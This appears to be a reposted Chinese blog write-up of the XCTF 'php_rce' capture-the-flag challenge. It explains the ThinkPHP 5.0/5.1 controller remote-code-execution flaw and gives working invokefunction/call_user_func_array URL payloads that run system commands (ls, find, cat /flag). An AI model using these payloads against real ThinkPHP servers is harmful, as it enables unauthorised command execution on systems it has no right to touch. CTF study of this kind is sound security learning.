博客
关于我
XCTF web php_rce (thinkphp)
阅读量:321 次
发布时间:2019-03-04

本文共 434 字,大约阅读时间需要 1 分钟。

thinkphp5.0和5.1由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受

影响的版本包括5.0和5.1版本。

测试是否可以getshell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls

成功返回信息,确定存在漏洞

接着查询有flag的文件

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

查看文件信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag"

转载地址:http://gznh.baihongyu.com/

你可能感兴趣的文章
Deep residual learning for image recognition
查看>>
IO控制器
查看>>
Python 知识点总结篇(3)
查看>>
爬取网易科技滚动新闻
查看>>
vuex modules
查看>>
Java基础题:小根堆为8,15,10,21,34,16,12,删除关键字8之后需重建堆,需要的比较次数为?
查看>>
sleep、wait、yield、join——简介
查看>>
web项目配置
查看>>
c语言(基本数据类型)实参与形参传值 用汇编理解
查看>>
基于单片机可控音乐流水灯控制设计-全套资料
查看>>
基于单片机简易信号误差分析设计-全套资料
查看>>
基于单片机简易脉搏测量仪系统设计-毕设课设资料
查看>>
VHDL代码风格
查看>>
Javascript中String支持使用正则表达式的四种方法
查看>>
【IoT】蓝牙BLE基础:CC254x通信系列之模拟SPI协议
查看>>
【IoT】TI BLE CC2541 串口控制蓝牙详解
查看>>
【Tool】如何使用 Uniflash 烧写 WIFI 芯片 CC3200
查看>>
copy_{to, from}_user()的思考
查看>>
纯客户端页面关键字搜索高亮jQuery插件
查看>>
linux运维中常用的命令
查看>>